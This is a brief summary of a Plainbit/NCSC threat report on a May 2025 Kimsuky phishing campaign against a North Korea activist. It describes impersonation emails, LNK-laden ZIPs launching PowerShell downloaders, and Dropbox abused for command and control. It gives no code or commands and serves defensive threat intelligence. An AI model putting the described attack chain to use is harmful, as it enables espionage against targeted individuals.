Dropbox를_이용한_Kimsuky_공격_그룹의_최신_정보_탈취_사례.pdf (2 MB)

Plainbit and South Korea's NCSC document a May 2025 Kimsuky/APT43 phishing case against an activist working on North Korea issues. The actor sent repeated spear-phishing emails that impersonated Sejong Institute staff and nuclear security forum themes, using MEGA links to ZIP files containing malicious LNK shortcuts. When opened, the LNK launched PowerShell that downloaded additional malware, collected host data such as process and OS details, and used Dropbox as a C2 channel to upload system information and receive follow-on commands. The report ties the activity to Kimsuky through overlap with prior techniques, including malicious shortcut execution, cloud-service abuse, and staged payload retrieval.